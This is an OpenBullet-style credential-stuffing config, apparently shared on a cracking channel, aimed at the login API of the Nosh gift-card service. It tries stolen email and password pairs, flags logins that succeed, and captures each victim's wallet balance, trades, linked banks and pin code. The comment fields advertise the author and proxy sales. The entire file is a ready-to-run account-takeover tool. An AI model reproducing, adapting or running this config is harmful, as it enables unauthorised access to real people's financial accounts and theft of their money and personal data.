[SETTINGS]
{
  "Name": "NOSH {GIFT CARDS}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-22T09:08:01.9579834-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MasterLordConfigs",
  "Version": "1.0.1 [CB]",
  "Descriptions": "",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "JOIN > @MasterLordConfigs",
      "VariableName": "",
      "Id": 2099670450
    },
    {
      "Description": "IF YOU HAVE PORTALS AND NEED VHQ PROXY > @MasterLord007",
      "VariableName": "",
      "Id": 2088710790
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://api.nosh.ng/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.nosh.ng" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Content-Type: application/json;charset=utf-8" 
  HEADER "Content-Length: 56" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.12" 
  HEADER "Connection: close" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email does not exists on our server." 
    KEY "Must be valid email." 
    KEY "Invalid credentials, could not log you in." 
  KEYCHAIN Success OR 
    KEY "balance" 

#NAME PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Name" 

#USERNAME PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username" 

#BALANCE PARSE "<SOURCE>" LR "wallet\":{\"balance\":" "," CreateEmpty=FALSE -> CAP "Balance" 

#TOTAL_TRADES PARSE "<SOURCE>" LR "totalTrades\":" "," CreateEmpty=FALSE -> CAP "Total Trades" 

#TRANSACTIONS PARSE "<SOURCE>" LR "transactions\":" "," CreateEmpty=FALSE -> CAP "Transactions" 

#TRADES PARSE "<SOURCE>" LR "trades\":" "," CreateEmpty=FALSE -> CAP "Trades" 

#BANKS PARSE "<SOURCE>" LR "banks\":" "," CreateEmpty=FALSE -> CAP "Banks" 

#PIN_CODE PARSE "<SOURCE>" JSON "pinCode" CreateEmpty=FALSE -> CAP "Pin Code" 

#CREATOR FUNCTION Constant "@MasterLordConfigs" -> CAP "Config By" 

